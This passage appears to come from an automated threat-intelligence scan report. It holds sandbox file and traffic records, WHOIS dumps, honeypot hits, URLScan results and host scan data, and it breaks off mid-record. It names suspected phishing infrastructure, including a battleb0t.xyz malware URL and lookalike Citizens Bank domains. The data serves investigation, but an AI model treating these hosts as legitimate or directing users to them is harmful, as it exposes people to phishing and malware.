"7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003496]\n "Cab6C48.tmp" has type "Microsoft Cabinet archive data 62397 bytes 1 file"- Location: [%TEMP%\\Cab6C48.tmp]- [targetUID: 00000000-00003496]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00001672]\n "~DF5FC6F40784D161C2.TMP" has type "data"- Location: [%TEMP%\\~DF5FC6F40784D161C2.TMP]- [targetUID: 00000000-00001672]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00001672]\n "H0X2P6A4.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\H0X2P6A4.txt]- [targetUID: 00000000-00003496]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /site.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: sprk.art\nDNT: 1\nConnection: Keep-Alive"\n "HTTP/1.1 200 OK\nAccept-Ranges: bytes\nAge: 0\nCache-Control: public, max-age=0, must-revalidate\nContent-Length: 426\nContent-Type: application/octet-stream\nDate: Wed, 12 Oct 2022 02:27:31 GMT\nEtag: "ed0b712b25ea3f6f62eb5eaeffcc657b-ssl"\nServer: Netlify\nStrict-Transport-Security: max-age=31536000\nX-Nf-Request-Id: 
01GF509F5VPQVTCDTRVY512617\n\n{\n "name": "",\n "short_name": "",\n "icons": [\n {\n "src": "/android-chrome-192x192.png",\n "sizes": "192x192",\n "type": "image/png"\n },\n {\n "src": "/android-chrome-512x512.png",\n "sizes": "512x512",\n "type": "image/png"\n }\n ],\n "theme_color": "#ffffff",\n "background_color": "#ffffff",\n "display": "standalone"\n}"\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: sprk.art\nDNT: 1\nConnection: Keep-Alive"\n "[binary favicon response bytes omitted]", "HTTP/1.1 200 OK\nAccept-Ranges: bytes\nAge: 1\nCache-Control: public, max-age=0, must-revalidate\nContent-Length: 15086\nContent-Type: image/vnd.microsoft.icon\nDate: Wed, 12 Oct 2022 02:27:34 GMT\nEtag: "832bb1c355ca71f3a980bf41 | 34.74.170.74 |
| 2023-05-12 02:45:54 | Physical Coordinates | No | AbstractAPI | 94 | 0 | 4 | 0 | None | 39.0469, -77.4903 | 2600:1f18:2489:8200::c8 |
| 2023-05-12 03:01:29 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.35): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:12:12 | Co-Hosted Site - Domain Whois | No | Whois | 3 | 0 | 4 | 0 | None | Domain Name: scoop.sh
Registry Domain ID: 688a2dc7e3804150a8a7bd65025fc26d-DONUTS
Registrar WHOIS Server: whois.gandi.net
Registrar URL: https://www.gandi.net
Updated Date: 2022-05-25T08:13:34Z
Creation Date: 2013-06-20T11:02:06Z
Registry Expiry Date: 2023-06-20T11:02:06Z
Registrar: Gandi SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: StudyStays
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: QLD
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: AU
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: ns-1530.awsdns-63.org
Name Server: ns-604.awsdns-11.net
Name Server: ns-308.awsdns-38.com
Name Server: ns-1776.awsdns-30.co.uk
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:12:12Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Terms of Use: Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by Identity Digital or the Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Identity Digital except as reasonably necessary to register domain names or modify existing registrations. When using the Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. 
Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data provided by Identity Digital can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Identity Digital Inc. and Registry Operator reserve the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
Domain Name: scoop.sh
Registry Domain ID: UNDEF-ROID
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2023-04-21T08:07:40Z
Creation Date: 2013-06-20T09:02:06Z
Registrar Registration Expiration Date: 2023-06-20T11:02:06Z
Registrar: GANDI SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Reseller:
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Domain Status:
Domain Status:
Domain Status:
Domain Status:
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: StudyStays
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province:
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: AU
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext:
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext:
Registrant Email: 09e034915a16543e65fa494a6f2d5f65-1767633@contact.gandi.net
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext:
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext:
Admin Email: 09e034915a16543e65fa494a6f2d5f65-1767633@contact.gandi.net
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext:
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext:
Tech Email: 09e034915a16543e65fa494a6f2d5f65-1767633@contact.gandi.net
Name Server: NS-604.AWSDNS-11.NET
Name Server: NS-1776.AWSDNS-30.CO.UK
Name Server: NS-308.AWSDNS-38.COM
Name Server: NS-1530.AWSDNS-63.ORG
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:12Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/epp
Reseller Email:
Reseller URL:
Personal data access and use are governed by French law, any use for the purpose of unsolicited mass commercial advertising as well as any mass or automated inquiries (for any intent other than the registration or modification of a domain name) are strictly forbidden. Copy of whole or part of our database without Gandi's endorsement is strictly forbidden.
A dispute over the ownership of a domain name may be subject to the alternate procedure established by the Registry in question or brought before the courts.
For additional information, please contact us via the following form:
https://www.gandi.net/support/contacter/mail/
| scoop.sh |
| 2023-05-12 03:01:24 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.231): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:55:27 | Raw Data from RIRs | No | URLScan.io | 1 | 0 | 1 | 0 | None | [{u'sort': [1679937961810, u'be713cda-cf3f-49bd-91b6-e8517dc017bf'], u'task': {u'domain': u'kekw.battleb0t.xyz', u'uuid': u'be713cda-cf3f-49bd-91b6-e8517dc017bf', u'tags': [u'falconsandbox'], u'url': u'http://kekw.battleb0t.xyz/jar', u'visibility': u'public', u'time': u'2023-03-27T17:26:01.810Z', u'apexDomain': u'battleb0t.xyz', u'method': u'api'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 0, u'encodedDataLength': 0, u'requests': 1, u'dataLength': 0}, u'screenshot': u'https://urlscan.io/screenshots/be713cda-cf3f-49bd-91b6-e8517dc017bf.png', u'_score': None, u'result': u'https://urlscan.io/api/v1/result/be713cda-cf3f-49bd-91b6-e8517dc017bf/', u'_id': u'be713cda-cf3f-49bd-91b6-e8517dc017bf', u'page': {u'url': u'http://kekw.battleb0t.xyz/jar', u'domain': u'kekw.battleb0t.xyz', u'apexDomain': u'battleb0t.xyz'}}, {u'sort': [1679768811151, u'4b027c18-4e16-4bfc-8793-6295946cceb7'], u'task': {u'domain': u'kekw.battleb0t.xyz', u'uuid': u'4b027c18-4e16-4bfc-8793-6295946cceb7', u'tags': [u'https://phish.report', u'@phish_report'], u'url': u'https://kekw.battleb0t.xyz/jar', u'visibility': u'public', u'time': u'2023-03-25T18:26:51.151Z', u'apexDomain': u'battleb0t.xyz', u'method': u'api'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 1, u'encodedDataLength': 84, u'requests': 1, u'dataLength': 11}, u'screenshot': u'https://urlscan.io/screenshots/4b027c18-4e16-4bfc-8793-6295946cceb7.png', u'_score': None, u'result': u'https://urlscan.io/api/v1/result/4b027c18-4e16-4bfc-8793-6295946cceb7/', u'_id': u'4b027c18-4e16-4bfc-8793-6295946cceb7', u'page': {u'mimeType': u'text/plain', u'status': u'502', u'domain': u'kekw.battleb0t.xyz', u'url': u'https://kekw.battleb0t.xyz/jar', u'country': u'DE', u'tlsValidFrom': u'2023-03-23T21:24:09.000Z', u'asnname': u'DIGITALOCEAN-ASN, US', u'tlsIssuer': u'Easypanel', u'tlsValidDays': 3650, u'ip': u'64.226.81.43', u'apexDomain': u'battleb0t.xyz', u'tlsAgeDays': 1, 
u'asn': u'AS14061'}}, {u'sort': [1678573216685, u'ac5ae0a3-e538-4bd1-ac20-6d6f8a5fe2ea'], u'task': {u'domain': u'kekw.battleb0t.xyz', u'uuid': u'ac5ae0a3-e538-4bd1-ac20-6d6f8a5fe2ea', u'tags': [u'https://phish.report', u'@phish_report'], u'url': u'http://kekw.battleb0t.xyz/', u'visibility': u'public', u'time': u'2023-03-11T22:20:16.685Z', u'apexDomain': u'battleb0t.xyz', u'method': u'api'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 1, u'encodedDataLength': 300, u'requests': 1, u'dataLength': 207}, u'screenshot': u'https://urlscan.io/screenshots/ac5ae0a3-e538-4bd1-ac20-6d6f8a5fe2ea.png', u'_score': None, u'result': u'https://urlscan.io/api/v1/result/ac5ae0a3-e538-4bd1-ac20-6d6f8a5fe2ea/', u'_id': u'ac5ae0a3-e538-4bd1-ac20-6d6f8a5fe2ea', u'page': {u'mimeType': u'text/html', u'status': u'404', u'domain': u'kekw.battleb0t.xyz', u'title': u'404 Not Found', u'url': u'https://kekw.battleb0t.xyz/', u'ip': u'46.101.229.70', u'tlsValidFrom': u'2023-01-27T17:58:43.000Z', u'asnname': u'DIGITALOCEAN-ASN, US', u'server': u'Werkzeug/2.2.2 Python/3.10.9', u'tlsIssuer': u'R3', u'tlsValidDays': 89, u'country': u'DE', u'redirected': u'https-only', u'apexDomain': u'battleb0t.xyz', u'tlsAgeDays': 43, u'asn': u'AS14061'}}, {u'sort': [1678573191537, u'd8289b22-dbac-48d2-856a-e99fe632406b'], u'task': {u'domain': u'kekw.battleb0t.xyz', u'uuid': u'd8289b22-dbac-48d2-856a-e99fe632406b', u'tags': [u'https://phish.report', u'@phish_report'], u'url': u'http://kekw.battleb0t.xyz/', u'visibility': u'public', u'time': u'2023-03-11T22:19:51.537Z', u'apexDomain': u'battleb0t.xyz', u'method': u'api'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 1, u'encodedDataLength': 300, u'requests': 1, u'dataLength': 207}, u'screenshot': u'https://urlscan.io/screenshots/d8289b22-dbac-48d2-856a-e99fe632406b.png', u'_score': None, u'result': u'https://urlscan.io/api/v1/result/d8289b22-dbac-48d2-856a-e99fe632406b/', u'_id': u'd8289b22-dbac-48d2-856a-e99fe632406b', u'page': {u'mimeType': u'text/html', u'status': 
u'404', u'domain': u'kekw.battleb0t.xyz', u'title': u'404 Not Found', u'url': u'https://kekw.battleb0t.xyz/', u'ip': u'46.101.229.70', u'tlsValidFrom': u'2023-01-27T17:58:43.000Z', u'asnname': u'DIGITALOCEAN-ASN, US', u'server': u'Werkzeug/2.2.2 Python/3.10.9', u'tlsIssuer': u'R3', u'tlsValidDays': 89, u'country': u'DE', u'redirected': u'https-only', u'apexDomain': u'battleb0t.xyz', u'tlsAgeDays': 43, u'asn': u'AS14061'}}] | battleb0t.xyz |
| 2023-05-12 03:31:30 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 6 | 0 | None | abuse@nicproxy.com | Domain Name: KEYUBU.COM
Registry Domain ID: 2292564494_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.nicproxy.com
Registrar URL: http://https://nicproxy.com/
Updated Date: 2022-07-15T17:58:33Z
Creation Date: 2018-07-31T21:39:32Z
Registry Expiry Date: 2023-07-31T21:39:32Z
Registrar: Nics Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90 212 213 2963
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: LLOYD.NS.CLOUDFLARE.COM
Name Server: MOLLY.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: KEYUBU.COM
Registry Domain ID : 2292564494_DOMAIN_COM-VRSN
Registrar WHOIS Server : whois.nicproxy.com
Registrar URL: http://www.nicproxy.com
Updated Date: 2022-07-15T17:58:33Z
Creation Date: 2018-07-31T21:39:32Z
Registrar Registration Expiration Date: 2023-07-31T21:39:32Z
Registrar: NICS Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90.2122132963
Reseller: CIZGI TELEKOMUNIKASYON A.S - NATRO
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID: CID-Redacted for Privacy
Registrant Name: Redacted for Privacy
Registrant Organization: Redacted for Privacy
Registrant Street: Redacted for Privacy
Registrant City: ADANA
Registrant State / Province: Redacted for Privacy
Registrant Postal Code: Redacted for Privacy
Registrant Country: TR
Registrant Phone: Redacted for Privacy
Registrant Phone Ext: Redacted for Privacy
Registrant Fax: Redacted for Privacy
Registrant Fax Ext: Redacted for Privacy
Registrant Email: https://whoisshelter.nicproxy.com/?d=KEYUBU.COM
Registry Admin ID: CID-Redacted for Privacy
Admin Name: Redacted for Privacy
Admin Organization: Redacted for Privacy
Admin Street: Redacted for Privacy
Admin City: Redacted for Privacy
Admin State / Province: Redacted for Privacy
Admin Postal Code: Redacted for Privacy
Admin Country: Redacted for Privacy
Admin Phone: Redacted for Privacy
Admin Phone Ext: Redacted for Privacy
Admin Fax: Redacted for Privacy
Admin Fax Ext: Redacted for Privacy
Admin Email: Redacted for Privacy
Registry Tech ID: CID-Redacted for Privacy
Tech Name: Redacted for Privacy
Tech Organization: Redacted for Privacy
Tech Street: Redacted for Privacy
Tech City: Redacted for Privacy
Tech State / Province: Redacted for Privacy
Tech Postal Code: Redacted for Privacy
Tech Country: Redacted for Privacy
Tech Phone: Redacted for Privacy
Tech Phone Ext: Redacted for Privacy
Tech Fax: Redacted for Privacy
Tech Fax Ext: Redacted for Privacy
Tech Email: Redacted for Privacy
Name Server: LLOYD.NS.CLOUDFLARE.COM
Name Server: MOLLY.NS.CLOUDFLARE.COM
DNSSEC: Unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>>Last update of WHOIS database: 2023-05-12T03:12:03Z<<<
For more information on Whois status codes, please visit https://icann.org/epp
IMPORTANT: Port43 will provide the ICANN-required minimum data set per
ICANN Temporary Specification, adopted 04 Jun 2018.
Visit whois.nicproxy.com to look up contact data for domains
not covered by GDPR policy.
!****************************************************************************!
NICS Telekomunikasyon A.S., uluslararasi alan adi kayit otoritesi olan ICANN
onayli bir alan adi kayit firmasidir.
Bu alan adina ait web sitesinin icerigi ya da yayinlanmasiyla hicbir sekilde ilgisi yoktur.
Sadece, ICANN kurallari cercevesinde alan adinin kayit edilmesine aracilik yapmaktadir.
Bu alan adi sahibinin kayit sirasinda verdigi bilgiler yukaridaki gibidir.
NICS Telekomunikasyon A.S., bu bilgilerin dogrulugunu garanti edemez.
Daha fazla bilgi almak icin info [at] nicproxy.com adresine yazabilirsiniz.
!*****************************************************************************!
The data in the WHOIS database of NICS Telekomunikasyon A.S. is provided by
Nics Telekomunikasyon Ltd. for information purposes, and to assist persons in
obtaining information about or related to domain name registration
records. NICS Telekomunikasyon A.S. does not guarantee its accuracy.
By submitting a WHOIS query, you agree that you will use this data
only for lawful purposes and that, under no circumstances, you will
use this data to
1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via E-mail(spam) or
2) enable high volume, automated, electronic processes that apply
to Nics Telekomunikasyon Ltd. or its systems.
Nics Telekomunikasyon Ltd. reserves the right to modify these terms.
By submitting this query, you agree to abide by this policy.
NICProxy Whois Server Ver.1.2.2
|
| 2023-05-12 03:00:29 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | aes128-gcm@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T07:25:44.787Z", "ip": "46.101.229.70", "labels": ["remote-access"], "location_updated_at": "2023-05-01T12:20:02.406356Z", "autonomous_system_updated_at": "2023-05-01T12:20:02.407454Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"www3citi5ensbnk01.nerdpol.ovh": {"record_type": "A", "resolved_at": "2023-05-08T21:52:09.615214562Z"}, "www3citizensbnk01.ddns.net": {"record_type": "A", "resolved_at": "2023-04-03T07:30:40.764584949Z"}, "www3citlzensbnk.ddns.net": {"record_type": "A", "resolved_at": "2023-04-23T19:19:28.631638390Z"}, "chainsyncpages.ddns.net": {"record_type": "A", "resolved_at": "2023-04-05T19:58:37.967204478Z"}, "mail.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-05-03T14:09:55.384272288Z"}, "jnbt05.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-10T17:13:22.939829997Z"}, "intelligent-euclid.46-101-229-70.plesk.page": {"record_type": "A", "resolved_at": "2023-04-28T22:08:15.278436745Z"}, "www.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.707553225Z"}, "46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.520320906Z"}}, "names": ["chainsyncpages.ddns.net", "www3citi5ensbnk01.nerdpol.ovh", "www3citizensbnk01.ddns.net", "www3citlzensbnk.ddns.net", "www.46-101-229-70.cprapid.com", "46-101-229-70.cprapid.com", "intelligent-euclid.46-101-229-70.plesk.page", "jnbt05.easypanel.host", 
"mail.46-101-229-70.cprapid.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T07:25:44.640117776Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "28960,64,true,MSTNW,1460,false,false", "os": "Ubuntu / Debian / CentOS", "id": 72}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "654b926728b59e31856ca456546380aae9ad6f0105be964db40d456c35d8474b", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "b/8s4eFX87LHgM34ZW3g9GyhRKNQyQUUsPt17LQ/ZJc=", "x": "OF+EuiYliuprX40ENBhAbc+GOunuKTpVTjg/1oXm5JM=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], 
"server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", 
